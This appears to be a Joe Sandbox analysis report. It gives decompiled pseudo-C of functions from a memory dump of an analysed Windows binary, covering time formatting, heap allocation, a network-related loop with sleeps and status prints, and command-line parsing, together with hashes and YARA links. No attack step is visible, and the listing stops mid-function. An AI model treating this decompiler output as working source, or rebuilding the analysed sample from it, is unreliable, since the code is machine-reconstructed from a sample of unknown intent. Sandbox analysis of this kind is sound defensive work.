Opcode Fuzzy Hash: f28c58954e970b4bc88306afcce4bab22201ab15947e6d69cbb169e9bbfbc0dd
Instruction Fuzzy Hash: 9101697DA04208ABCB60DBF4DD48BDEB3B8AB89310F104598E649D6281E7319E21DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A43970 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E00A43970(intOrPtr __ecx) {
				intOrPtr _v8;
				intOrPtr _v12;
				struct _SYSTEMTIME _v28;
				intOrPtr _t13;
				void* _t22;

				_v12 = __ecx;
				_v8 = 0;
				GetSystemTime( &_v28);
				_push(_v28.wMilliseconds & 0x0000ffff);
				_push(_v28.wSecond & 0x0000ffff);
				_push(_v28.wMinute & 0x0000ffff);
				_t13 = E00A43830(_t22, _v12, "%02hu:%02hu:%02hu:%04hu", _v28.wHour & 0x0000ffff); // executed
				_v8 = _t13;
				return _v8;
			}

0x00a43976
0x00a43979
0x00a43984
0x00a4398e
0x00a43993
0x00a43998
0x00a439a7
0x00a439af
0x00a439b8

APIs

GetSystemTime.KERNEL32(?,?,?,?,?,00A43A22), ref: 00A43984

Strings

%02hu:%02hu:%02hu:%04hu, xrefs: 00A4399E

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: SystemTime
String ID: %02hu:%02hu:%02hu:%04hu
API String ID: 2656138-503838169
Opcode ID: 66d0411fa196bc0c849b60d5e3818f185f18fbed2662218a0df87b029596ef7d
Instruction ID: 3908bffcf7a7d7422a7674d4428e3f6229fef94876833313795b75333cb958d5
Opcode Fuzzy Hash: 66d0411fa196bc0c849b60d5e3818f185f18fbed2662218a0df87b029596ef7d
Instruction Fuzzy Hash: 6FF039BAC0021CBACB00EFD9DD459FFB7F8AB88701F4041C9BA04A3240E2795A50D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00A42420 Relevance: 3.0, APIs: 2, Instructions: 18
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A42420(void* __ecx, long _a4) {
				void* _v8;
				void* _t7;

				_t7 = RtlAllocateHeap(GetProcessHeap(), 8, _a4); // executed
				_v8 = _t7;
				if(_v8 == 0) {
					return 0;
				}
				return _v8;
			}

0x00a42431
0x00a42437
0x00a4243e
0x00000000
0x00a42445
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,00000000,?,?,00A4262C,00000000,?,00A450E3,000001AC,00000000,?,00A49C88,00000000,00000000,00A49C80), ref: 00A4242A
RtlAllocateHeap.NTDLL(00000000,?,?,00A4262C,00000000,?,00A450E3,000001AC,00000000,?,00A49C88,00000000,00000000,00A49C80), ref: 00A42431

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 72f771c9525002ea6f88160cce0d28f79a990e8f98784fdbd3a3574e5c123be8
Instruction ID: c3099c69b5767514f2a69d5c16d98ab8e22f07901f5bfe4a845d9c04b98f65d0
Opcode Fuzzy Hash: 72f771c9525002ea6f88160cce0d28f79a990e8f98784fdbd3a3574e5c123be8
Instruction Fuzzy Hash: F2E01279505108EBCB40DFE8D809B6BB7B8E789301F504455B906C3150D7315E10D761

Uniqueness

Uniqueness Score: -1.00%

Function 00A46A80 Relevance: 32.2, APIs: 8, Strings: 10, Instructions: 656
sleepnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00A46A80(void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				long _v28;
				signed int _v32;
				signed int _v36;
				long _v40;
				signed int _v44;
				long _v48;
				long _v52;
				char* _v56;
				long _v60;
				char* _v64;
				intOrPtr _v68;
				long _v72;
				intOrPtr _v76;
				char _v204;
				char _v460;
				void* _t366;
				signed int _t375;
				signed int _t376;
				signed int _t379;
				signed int _t386;
				void* _t390;
				signed int _t399;
				signed int _t433;
				intOrPtr _t437;
				signed int _t440;
				long _t451;
				intOrPtr _t467;
				signed int _t496;
				signed int _t497;
				long _t499;
				signed int _t501;
				signed int _t517;
				signed int _t518;
				signed int _t525;
				intOrPtr _t536;
				long _t549;
				signed int _t551;
				intOrPtr _t573;
				signed int _t595;
				signed int _t609;
				void* _t616;
				signed int _t617;
				signed int _t618;
				long _t619;
				signed int _t620;
				signed int _t638;
				signed int _t639;
				intOrPtr _t647;
				signed int _t672;
				long _t682;
				signed int _t684;
				void* _t695;
				void* _t696;
				void* _t697;
				void* _t698;
				void* _t699;

				_v36 = 0xffffffff;
				_v44 = 0;
				 *(_a4 + 0x10018) = 1;
				_v40 = 0;
				E00A41F80(_a4);
				 *((char*)(_a4 + 0x10044)) = 4;
				_v68 =  *((intOrPtr*)(_a4 + 0x10d58));
				if( *(_a4 + 0x10d5c) > 0) {
					Sleep( *(_a4 + 0x10d5c) * 0x3c * 0x3e8);
				}
				_push( *((intOrPtr*)(_a4 + 0x1014c)));
				_push(0x68b0);
				_t366 = E00A436C0(_a4 + 0x1001d); // executed
				E00A43A00(_a4 + 0x1001d, _t366, " %s M%X SGCNT %d \n", _a4 + 0x1001d); // executed
				_t697 = _t696 + 0x14;
				while(1) {
					_v72 = _v40;
					_v76 = _v68;
					_v40 = _v40 + 1;
					if(_v72 >= _v76) {
						break;
					}
					_v44 = _v44 + 1;
					if(( *(_a4 + 0x10018) & 0x000000ff) != 1) {
						L9:
						_t517 = _a4;
						__eflags = ( *(_t517 + 0x10018) & 0x000000ff) - 1;
						if(( *(_t517 + 0x10018) & 0x000000ff) != 1) {
							_t518 = _a4;
							__eflags =  *((intOrPtr*)(_t518 + 0x10038)) - 0xffffffff;
							if( *((intOrPtr*)(_t518 + 0x10038)) != 0xffffffff) {
								E00A46480(_v8, _a4);
								E00A42540( &_v204, 0x80);
								_v28 = 0;
								__eflags = _v36 - 0xffffffff;
								if(_v36 <= 0xffffffff) {
									_v48 = 0;
								} else {
									_v48 = _v36 + 1;
								}
								_v24 = _v48;
								while(1) {
									_t375 = _a4;
									__eflags = _v24 -  *((intOrPtr*)(_t375 + 0x10d58));
									if(_v24 >  *((intOrPtr*)(_t375 + 0x10d58))) {
										break;
									}
									_v36 = _v24;
									_t390 = _a4 + _v24;
									_t529 =  *((char*)(_t390 + 0x10956));
									__eflags =  *((char*)(_t390 + 0x10956));
									if( *((char*)(_t390 + 0x10956)) != 0) {
										_t616 = _a4 + _v24;
										__eflags =  *((char*)(_t616 + 0x10556));
										if( *((char*)(_t616 + 0x10556)) != 0) {
											_v32 = 0;
											while(1) {
												_t617 = _a4;
												__eflags = _v32 -  *((intOrPtr*)(_t617 + 0x1014c));
												if(_v32 >=  *((intOrPtr*)(_t617 + 0x1014c))) {
													break;
												}
												_t536 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10148)) + _v32 * 4));
												__eflags =  *((intOrPtr*)(_t536 + 0xc)) - _v24;
												if( *((intOrPtr*)(_t536 + 0xc)) == _v24) {
													E00A42540( &_v460, 0x100);
													_v12 = E00A46860(_v8,  &_v460, 6, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10148)) + _v32 * 4)))), 0, _a4,  *( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10148)) + _v32 * 4)) + 4) & 0x000000ff,  *( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10148)) + _v32 * 4)) + 9) & 0x000000ff);
													__eflags = _v12;
													if(_v12 > 0) {
														__eflags = _v28 + _v12 - 0x80;
														if(_v28 + _v12 >= 0x80) {
															E00A457D0( &_v204, _v8,  &_v204, _v28, _a4);
															_v28 = 0;
															E00A42540( &_v204, 0x80);
														}
														E00A42190(_t695 + _v28 - 0xc8,  &_v460, _v12);
														_t697 = _t697 + 0xc;
														_v28 = _v28 + _v12;
														_t549 =  *(_a4 + 8) + 1;
														__eflags = _t549;
														 *(_a4 + 8) = _t549;
													}
													Sleep(0x3e8);
												}
												_t529 = _v32 + 1;
												__eflags = _t529;
												_v32 = _t529;
											}
											__eflags = _v28;
											if(_v28 > 0) {
												E00A457D0(_v28, _v8,  &_v204, _v28, _a4);
												_v28 = 0;
												_t529 =  &_v204;
												E00A42540( &_v204, 0x80);
											}
											L76:
											__eflags = _a4;
											if(_a4 == 0) {
												L80:
												__eflags = _a4;
												if(_a4 != 0) {
													_t618 = _a4;
													__eflags =  *(_t618 + 0x10d60);
													if( *(_t618 + 0x10d60) > 0) {
														E00A439C0(E00A436C0(_t529));
														_push(0x68b3);
														E00A43830(__eflags, E00A436C0(_t393), " %s M%X \n", _a4 + 0x1001d);
														_t697 = _t697 + 0x10;
														_t619 =  *(_a4 + 0x10d60) * 0x3e8;
														__eflags = _t619;
														Sleep(_t619);
													}
												}
												L83:
												break;
											}
											_t620 = _a4;
											__eflags =  *((intOrPtr*)(_t620 + 0x10d68)) - 0xffffffff;
											if( *((intOrPtr*)(_t620 + 0x10d68)) == 0xffffffff) {
												goto L80;
											}
											_t399 = _a4;
											_t529 = _v36;
											__eflags = _v36 -  *((intOrPtr*)(_t399 + 0x10d68));
											if(_v36 !=  *((intOrPtr*)(_t399 + 0x10d68))) {
												goto L80;
											}
											E00A439C0(E00A436C0(_t529));
											_push(0x68b2);
											E00A43830(__eflags, E00A436C0(_t400), " %s M%X \n", _a4 + 0x1001d);
											_t697 = _t697 + 0x10;
											Sleep( *(_a4 + 0x10d64) * 0x3e8);
											goto L83;
										}
										_v16 = 0;
										while(1) {
											_t638 = _a4;
											__eflags = _v16 -  *((intOrPtr*)(_t638 + 0x1014c));
											if(_v16 >=  *((intOrPtr*)(_t638 + 0x1014c))) {
												break;
											}
											_t573 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10148)) + _v16 * 4));
											__eflags =  *((intOrPtr*)(_t573 + 0xc)) - _v24;
											if( *((intOrPtr*)(_t573 + 0xc)) == _v24) {
												_t467 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10148)) + _v16 * 4));
												__eflags =  *(_t467 + 8) & 0x000000ff;
												if(( *(_t467 + 8) & 0x000000ff) != 0) {
													_v12 = E00A465E0(_v8, 6, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10148)) + _v16 * 4)))), 1, _a4,  *( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10148)) + _v16 * 4)) + 4) & 0x000000ff,  *( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10148)) + _v16 * 4)) + 9) & 0x000000ff);
												}
												_t529 = _a4;
												__eflags = ( *(_t529 + 0x10018) & 0x000000ff) - 1;
												if(( *(_t529 + 0x10018) & 0x000000ff) != 1) {
													_t529 = _v8;
													_v12 = E00A465E0(_v8, 6, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10148)) + _v16 * 4)))), 0, _a4,  *( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10148)) + _v16 * 4)) + 4) & 0x000000ff,  *( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10148)) + _v16 * 4)) + 9) & 0x000000ff);
													_t672 = _a4;
													__eflags = ( *(_t672 + 0x10018) & 0x000000ff) - 1;
													if(( *(_t672 + 0x10018) & 0x000000ff) != 1) {
														_t582 = _v12 & 0x00000040;
														__eflags = _v12 & 0x00000040;
														if((_v12 & 0x00000040) == 0) {
															E00A439C0(E00A436C0(_t582));
															_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10148)) + _v16 * 4)))));
															_push(0x68b1);
															__eflags = _a4 + 0x1001d;
															E00A43830(__eflags, E00A436C0(_a4 + 0x1001d), " %s M%X %d\n", _a4 + 0x1001d);
															_t697 = _t697 + 0x14;
														}
														L29:
														_t529 = _v16 + 1;
														__eflags = _t529;
														_v16 = _t529;
														continue;
													}
												} else {
												}
												break;
											}
											goto L29;
										}
										_t639 = _a4;
										__eflags =  *(_t639 + 0x10046) & 0x000000ff;
										if(( *(_t639 + 0x10046) & 0x000000ff) == 0) {
											L63:
											goto L76;
										}
										Sleep(0x3e8);
										_v36 = 0xffffffff;
										_t551 = _a4;
										__eflags =  *(_t551 + 0x10045) & 0x000000ff;
										if(( *(_t551 + 0x10045) & 0x000000ff) != 0) {
											_v52 = 0;
										} else {
											_v52 = 1;
										}
										 *((char*)(_a4 + 0x10045)) = _v52;
										E00A439C0(E00A436C0(_v52));
										_push(0x68b3);
										E00A43830(__eflags, E00A436C0(_t429), " %s M%X \n", _a4 + 0x1001d);
										_t699 = _t697 + 0x10;
										_t433 = _a4;
										_t554 =  *(_t433 + 0x10045) & 0x000000ff;
										__eflags =  *(_t433 + 0x10045) & 0x000000ff;
										if(( *(_t433 + 0x10045) & 0x000000ff) == 0) {
											_v56 = "OFF\n\n";
										} else {
											_v56 = "ON\n\n";
										}
										E00A43830(__eflags, E00A436C0(_t554), "\nCurrent operation : %s", _v56);
										_t697 = _t699 + 0xc;
										_v20 = 0;
										while(1) {
											_t529 = _a4;
											__eflags = _v20 -  *((intOrPtr*)(_t529 + 0x1014c));
											if(_v20 >=  *((intOrPtr*)(_t529 + 0x1014c))) {
												goto L63;
											}
											_t437 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10148)) + _v20 * 4));
											__eflags =  *((intOrPtr*)(_t437 + 0xc)) - _v24;
											if( *((intOrPtr*)(_t437 + 0xc)) == _v24) {
												_t647 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10148)) + _v20 * 4));
												__eflags =  *(_t647 + 8) & 0x000000ff;
												if(( *(_t647 + 8) & 0x000000ff) != 0) {
													_v12 = E00A465E0(_v8, 6, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10148)) + _v20 * 4)))), 1, _a4,  *( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10148)) + _v20 * 4)) + 4) & 0x000000ff,  *( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10148)) + _v20 * 4)) + 9) & 0x000000ff);
												}
												_t440 = _a4;
												_t529 =  *(_t440 + 0x10018) & 0x000000ff;
												__eflags = ( *(_t440 + 0x10018) & 0x000000ff) - 1;
												if(( *(_t440 + 0x10018) & 0x000000ff) != 1) {
													_v12 = E00A465E0(_v8, 6, 0,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10148)) + _v20 * 4)))), 0, _a4,  *( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10148)) + _v20 * 4)) + 4) & 0x000000ff,  *( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10148)) + _v20 * 4)) + 9) & 0x000000ff);
													_t529 = _a4;
													__eflags = ( *(_t529 + 0x10018) & 0x000000ff) - 1;
													if(( *(_t529 + 0x10018) & 0x000000ff) != 1) {
														__eflags = _v12 & 0x00000040;
														if((_v12 & 0x00000040) == 0) {
															E00A439C0(E00A436C0(_t529));
															_push( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10148)) + _v20 * 4)))));
															_push(0x68b1);
															__eflags = _a4 + 0x1001d;
															E00A43830(__eflags, E00A436C0( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x10148)) + _v20 * 4))), " %s M%X %d\n", _a4 + 0x1001d);
															_t697 = _t697 + 0x14;
														}
														L50:
														_t451 = _v20 + 1;
														__eflags = _t451;
														_v20 = _t451;
														continue;
													}
												} else {
												}
												goto L63;
											}
											goto L50;
										}
										goto L63;
									}
									_t682 = _v24 + 1;
									__eflags = _t682;
									_v24 = _t682;
								}
								_t376 = _a4;
								__eflags =  *(_t376 + 0x10046) & 0x000000ff;
								if(( *(_t376 + 0x10046) & 0x000000ff) != 0) {
									_t609 = _a4;
									__eflags = _v36 -  *((intOrPtr*)(_t609 + 0x10d58));
									if(_v36 >=  *((intOrPtr*)(_t609 + 0x10d58))) {
										_v36 = 0xffffffff;
										_t525 = _a4;
										__eflags =  *(_t525 + 0x10045) & 0x000000ff;
										if(( *(_t525 + 0x10045) & 0x000000ff) != 0) {
											_v60 = 0;
										} else {
											_v60 = 1;
										}
										 *((char*)(_a4 + 0x10045)) = _v60;
										E00A439C0(E00A436C0(_v60));
										_push(0x68b3);
										E00A43830(__eflags, E00A436C0(_t382), " %s M%X \n", _a4 + 0x1001d);
										_t698 = _t697 + 0x10;
										_t386 = _a4;
										_t528 =  *(_t386 + 0x10045) & 0x000000ff;
										__eflags =  *(_t386 + 0x10045) & 0x000000ff;
										if(( *(_t386 + 0x10045) & 0x000000ff) == 0) {
											_v64 = "OFF\n\n";
										} else {
											_v64 = "ON\n\n";
										}
										E00A43830(__eflags, E00A436C0(_t528), "\nCurrent operation : %s", _v64);
										_t697 = _t698 + 0xc;
									}
								}
								Sleep(0x3e8);
								L94:
								_v12 = E00A46220(_v8, _a4);
								 *(_a4 + 0x10018) = 1;
								_t379 = _a4;
								__eflags = ( *(_t379 + 0x10018) & 0x000000ff) - 1;
								if(( *(_t379 + 0x10018) & 0x000000ff) != 1) {
								}
								continue;
							}
							 *((intOrPtr*)(_a4 + 0x10038)) = E00A46310(_v8, _a4);
							_t684 = _a4;
							__eflags =  *((intOrPtr*)(_t684 + 0x10038)) - 0xffffffff;
							if( *((intOrPtr*)(_t684 + 0x10038)) != 0xffffffff) {
								_push( *((intOrPtr*)(_a4 + 0x10038)));
								_push(0x68b4);
								E00A43830(__eflags, E00A436C0( *((intOrPtr*)(_a4 + 0x10038))), " %s ST%X %d\n", _a4 + 0x1001d);
								_t697 = _t697 + 0x14;
							}
							goto L94;
						}
						_t496 = _a4;
						__eflags =  *(_t496 + 0xc);
						if( *(_t496 + 0xc) != 0) {
							_t595 = _a4;
							_t497 = _v44;
							asm("cdq");
							__eflags = _t497 %  *(_t595 + 0xc);
							if(_t497 %  *(_t595 + 0xc) == 0) {
								_t499 =  *(_a4 + 0x10040) * 0x3e8;
								__eflags = _t499;
								Sleep(_t499);
							}
						}
						continue;
					}
					_t501 = E00A45650(_a4 + 0x1001d,  *((intOrPtr*)(_a4 + 0x10034))); // executed
					_v8 = _t501;
					if(_v8 != 0xffffffff) {
						 *(_a4 + 0x10018) = 0;
						 *((char*)(_a4 + 0x1001b)) = 1;
						 *(_a4 + 4) = 0;
						 *(_a4 + 8) = 0;
						_v12 = E00A46140(_v8, _a4);
						_v12 = E00A45F10(_v8, _a4);
						goto L9;
					} else {
						 *(_a4 + 0x10018) = 1;
						 *((char*)(_a4 + 0x1001b)) = 0;
						break;
					}
				}
				__imp__#116(); // executed
				return 0;
			}

0x00a46a89
0x00a46a90
0x00a46a9a
0x00a46aa1
0x00a46aab
0x00a46ab3
0x00a46ac3
0x00a46ad0
0x00a46ae3
0x00a46ae3
0x00a46af2
0x00a46af3
0x00a46b07
0x00a46b0d
0x00a46b12
0x00a46b15
0x00a46b18
0x00a46b1e
0x00a46b27
0x00a46b30
0x00000000
0x00000000
0x00a46b3c
0x00a46b4c
0x00a46bd7
0x00a46bd7
0x00a46be1
0x00a46be4
0x00a46c16
0x00a46c19
0x00a46c20
0x00a46c8e
0x00a46c9f
0x00a46ca4
0x00a46cab
0x00a46caf
0x00a46cbc
0x00a46cb1
0x00a46cb7
0x00a46cb7
0x00a46cc6
0x00a46cd4
0x00a46cd4
0x00a46cda
0x00a46ce0
0x00000000
0x00000000
0x00a46ce9
0x00a46cef
0x00a46cf2
0x00a46cf9
0x00a46cfb
0x00a46d02
0x00a46d0c
0x00a46d0e
0x00a47095
0x00a470a7
0x00a470a7
0x00a470ad
0x00a470b3
0x00000000
0x00000000
0x00a470c5
0x00a470cb
0x00a470ce
0x00a470de
0x00a47137
0x00a4713a
0x00a4713e
0x00a47146
0x00a4714c
0x00a47161
0x00a47166
0x00a47179
0x00a47179
0x00a47194
0x00a47199
0x00a471a2
0x00a471ab
0x00a471ab
0x00a471b1
0x00a471b1
0x00a471b9
0x00a471b9
0x00a470a1
0x00a470a1
0x00a470a4
0x00a470a4
0x00a471c4
0x00a471c8
0x00a471dd
0x00a471e2
0x00a471ee
0x00a471f5
0x00a471f5
0x00a471fa
0x00a471fa
0x00a471fe
0x00a4725e
0x00a4725e
0x00a47262
0x00a47264
0x00a47267
0x00a4726e
0x00a47277
0x00a4727c
0x00a47295
0x00a4729a
0x00a472a0
0x00a472a0
0x00a472ab
0x00a472ab
0x00a4726e
0x00a472b1
0x00000000
0x00a472b1
0x00a47200
0x00a47203
0x00a4720a
0x00000000
0x00000000
0x00a4720c
0x00a4720f
0x00a47212
0x00a47218
0x00000000
0x00000000
0x00a47221
0x00a47226
0x00a47240
0x00a47245
0x00a47256
0x00000000
0x00a47256
0x00a46d14
0x00a46d26
0x00a46d26
0x00a46d2c
0x00a46d32
0x00000000
0x00000000
0x00a46d44
0x00a46d4a
0x00a46d4d
0x00a46d5d
0x00a46d64
0x00a46d66
0x00a46db5
0x00a46db5
0x00a46db8
0x00a46dc2
0x00a46dc5
0x00a46e10
0x00a46e19
0x00a46e1c
0x00a46e26
0x00a46e29
0x00a46e30
0x00a46e30
0x00a46e33
0x00a46e3c
0x00a46e52
0x00a46e53
0x00a46e5b
0x00a46e6d
0x00a46e72
0x00a46e72
0x00a46d1d
0x00a46d20
0x00a46d20
0x00a46d23
0x00000000
0x00a46d23
0x00000000
0x00a46dc7
0x00000000
0x00a46dc5
0x00000000
0x00a46d4f
0x00a46e7a
0x00a46e84
0x00a46e86
0x00a47090
0x00000000
0x00a47090
0x00a46e91
0x00a46e97
0x00a46e9e
0x00a46ea8
0x00a46eaa
0x00a46eb5
0x00a46eac
0x00a46eac
0x00a46eac
0x00a46ec2
0x00a46ecf
0x00a46ed4
0x00a46eee
0x00a46ef3
0x00a46ef6
0x00a46ef9
0x00a46f00
0x00a46f02
0x00a46f0d
0x00a46f04
0x00a46f04
0x00a46f04
0x00a46f23
0x00a46f28
0x00a46f2b
0x00a46f3d
0x00a46f3d
0x00a46f43
0x00a46f49
0x00000000
0x00000000
0x00a46f5b
0x00a46f61
0x00a46f64
0x00a46f74
0x00a46f7b
0x00a46f7d
0x00a46fcc
0x00a46fcc
0x00a46fcf
0x00a46fd2
0x00a46fd9
0x00a46fdc
0x00a47030
0x00a47033
0x00a4703d
0x00a47040
0x00a47047
0x00a4704a
0x00a47053
0x00a47069
0x00a4706a
0x00a47072
0x00a47083
0x00a47088
0x00a47088
0x00a46f34
0x00a46f37
0x00a46f37
0x00a46f3a
0x00000000
0x00a46f3a
0x00000000
0x00a46fde
0x00000000
0x00a46fdc
0x00000000
0x00a46f66
0x00000000
0x00a46f3d
0x00a46cce
0x00a46cce
0x00a46cd1
0x00a46cd1
0x00a472b8
0x00a472c2
0x00a472c4
0x00a472ca
0x00a472d0
0x00a472d6
0x00a472dc
0x00a472e3
0x00a472ed
0x00a472ef
0x00a472fa
0x00a472f1
0x00a472f1
0x00a472f1
0x00a47307
0x00a47314
0x00a47319
0x00a47333
0x00a47338
0x00a4733b
0x00a4733e
0x00a47345
0x00a47347
0x00a47352
0x00a47349
0x00a47349
0x00a47349
0x00a47368
0x00a4736d
0x00a4736d
0x00a472d6
0x00a47375
0x00a4737b
0x00a47388
0x00a4738e
0x00a47395
0x00a4739f
0x00a473a2
0x00a473a2
0x00000000
0x00a473a2
0x00a46c32
0x00a46c38
0x00a46c3b
0x00a46c42
0x00a46c57
0x00a46c58
0x00a46c72
0x00a46c77
0x00a46c77
0x00000000
0x00a46c42
0x00a46be6
0x00a46be9
0x00a46bed
0x00a46bef
0x00a46bf2
0x00a46bf5
0x00a46bf9
0x00a46bfb
0x00a46c00
0x00a46c00
0x00a46c0b
0x00a46c0b
0x00a46bfb
0x00000000
0x00a46c11
0x00a46b66
0x00a46b6b
0x00a46b72
0x00a46b92
0x00a46b9c
0x00a46ba6
0x00a46bb0
0x00a46bc4
0x00a46bd4
0x00000000
0x00a46b74
0x00a46b77
0x00a46b81
0x00000000
0x00a46b81
0x00a46b72
0x00a473ae
0x00a473b9

APIs

Sleep.KERNEL32(00000000), ref: 00A46AE3
WSACleanup.WS2_32 ref: 00A473AE

Strings

%s M%X %d, xrefs: 00A47078
%s ST%X %d, xrefs: 00A46C67
%s M%X , xrefs: 00A47235
%s M%X , xrefs: 00A46EE3
%s M%X SGCNT %d , xrefs: 00A46B02
Current operation : %s, xrefs: 00A46F18
Current operation : %s, xrefs: 00A4735D
%s M%X , xrefs: 00A4728A
%s M%X , xrefs: 00A47328
%s M%X %d, xrefs: 00A46E62

Memory Dump Source

Source File: 00000000.00000002.273246346.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true

Associated: 00000000.00000002.273239754.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273265989.0000000000A49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273273320.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a40000_40_115.jbxd

Yara matches

Similarity

API ID: CleanupSleep
String ID: Current operation : %s$Current operation : %s$ %s M%X $ %s M%X $ %s M%X $ %s M%X $ %s M%X %d$ %s M%X %d$ %s M%X SGCNT %d $ %s ST%X %d
API String ID: 1660135218-252576147
Opcode ID: a8110e77cdd7e6720f1244c628d0c95c97307ff2fb3ef1e698539af217959f57
Instruction ID: 4213964cf15ea2e583c945933221a4b08215d9f0900a9debfd21557d9aff9335
Opcode Fuzzy Hash: a8110e77cdd7e6720f1244c628d0c95c97307ff2fb3ef1e698539af217959f57
Instruction Fuzzy Hash: F3523178A00244AFCB04DF54C595EEEBBB5BF89314F148198F9499F392C775EA81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A44640 Relevance: 21.7, APIs: 9, Strings: 3, Instructions: 689
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E00A44640(void* __eax, short* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char _v29;
				signed char _v30;
				signed char _v31;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char* _v164;
				intOrPtr _v168;
				char* _v172;
				intOrPtr _v176;
				char* _v180;
				int _v184;
				intOrPtr _v188;
				char* _v192;
				int _v196;
				intOrPtr _v200;
				char* _v204;
				int _v208;
				intOrPtr _v212;
				char* _v216;
				intOrPtr _v220;
				char* _v224;
				PWCHAR* _t460;
				signed char _t464;
				intOrPtr _t467;
				signed int _t474;
				signed int _t476;
				void* _t479;
				void* _t485;
				char* _t505;
				intOrPtr _t595;
				signed int _t601;
				void* _t746;
				void* _t747;
				void* _t748;

				if(_a4 == 0) {
					return __eax;
				}
				_v16 = 0;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_v48 = 1;
				_v28 = 0x6800;
				_t460 = CommandLineToArgvW(_a4,  &_v20); // executed
				_v16 = _t460;
				__eflags = _v16;
				if(_v16 != 0) {
					_v8 = 0;
					while(1) {
						__eflags = _v8 - _v20;
						if(_v8 >= _v20) {
							break;
						}
						_t584 = _v16;
						_t464 = E00A432A0( *((intOrPtr*)(_v16 + _v8 * 4)));
						__eflags = _t464 & 0x000000ff;
						if((_t464 & 0x000000ff) == 0) {
							L138:
							continue;
						}
						_v24 = E00A42420(_t584, 0x48);
						__eflags = _v24;
						if(_v24 == 0) {
							goto L138;
						}
						_v28 = 0x6800;
						_t467 = E00A42420(_t584, 0x10d70); // executed
						_v36 = _t467;
						_v12 = 1;
						_v88 =  *((intOrPtr*)(_v16 + _v8 * 4));
						 *_v24 = E00A43360(_v88);
						_v8 = _v8 + 1;
						__eflags = _v8 - _v20;
						if(_v8 >= _v20) {
							L10:
							_v28 = 0x6802;
							_v12 = 0;
							L11:
							__eflags = _v8 - _v20;
							if(_v8 >= _v20) {
								L14:
								_v28 = 0x6803;
								_v12 = 0;
								L15:
								__eflags = _v8 - _v20;
								if(_v8 >= _v20) {
									L18:
									_v28 = 0x6804;
									_v12 = 0;
									L19:
